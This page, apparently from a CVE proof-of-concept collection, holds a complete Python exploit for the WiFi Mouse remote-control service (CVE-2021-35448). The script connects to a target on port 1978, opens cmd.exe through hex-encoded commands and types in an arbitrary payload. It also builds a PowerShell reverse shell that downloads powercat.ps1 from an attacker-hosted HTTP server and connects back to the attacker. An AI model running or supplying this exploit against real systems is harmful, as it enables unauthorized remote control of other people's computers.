4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-3544
README.md
Rendering markdown...
POC / CVE-2021-35448.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/python3

import argparse
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import os

port = 1978

characters = {
    char: f"{ord(char):02x}" for char in (
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890 +=/_<>[]!@#$%^&*()-'\":;?`~\\|{},."
    )
}


def openCMD(target):
    target.send(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"))


def SendString(target, string):
    for char in string:
        packet = bytes.fromhex("7574663820" + characters[char] + "0a")
        target.send(packet)
        sleep(0.03)


def SendReturn(target):
    target.send(bytes.fromhex("6b657920203352544e"))
    sleep(0.5)


def exploit(target, payload):
    print("[+] Zzz ...")
    sleep(1)
    openCMD(target)
    print("[+] Sending payload...")
    sleep(1)
    SendString(target, payload)
    SendReturn(target)
    print("[+] Done!")


def generate_reverse_payload(http_ip, http_port, rev_ip, rev_port):
    return (
        f"powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{http_ip}:{http_port}/powercat.ps1');"
        f"powercat -c {rev_ip} -p {rev_port} -e powershell\""
    )

class LoggingHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        print(f"[HTTP Request] {self.address_string()} - {format % args}")


def start_http_server(ip, port):
    os.chdir(".")
    server_address = (ip, int(port))
    httpd = HTTPServer(server_address, LoggingHandler)
    print(f"[+] Serving HTTP on {ip}:{port} ...")
    httpd.serve_forever()


def main():
    parser = argparse.ArgumentParser(description="WiFi Mouse Exploit")
    parser.add_argument("-t", "--target", required=True, help="Target IP")
    parser.add_argument("-p", "--payload", required=False, help="Payload command")
    parser.add_argument("-r", "--reverse", help="Reverse shell IP:PORT")
    parser.add_argument("-l", "--http", help="HTTP server IP:PORT (required if using -r)")

    args = parser.parse_args()

    if args.reverse:
        if not args.http:
            parser.error("-l HTTP_IP:HTTP_PORT is required if -r is specified")
        rev_ip, rev_port = args.reverse.split(":")
        http_ip, http_port = args.http.split(":")

        if not os.path.isfile("powercat.ps1"):
            print("[!] Le fichier powercat.ps1 est introuvable dans le répertoire courant.")
            exit(1)

        http_thread = threading.Thread(target=start_http_server, args=(http_ip, http_port))
        http_thread.daemon = True
        http_thread.start()
        payload = generate_reverse_payload(http_ip, http_port, rev_ip, rev_port)

    elif args.payload:
        payload = args.payload
    else:
        parser.error("You must specify either -p or -r")

    target = socket(AF_INET, SOCK_STREAM)
    target.connect((args.target, port))
    exploit(target, payload)
    sleep(3)
    target.close()


if __name__ == "__main__":
    main()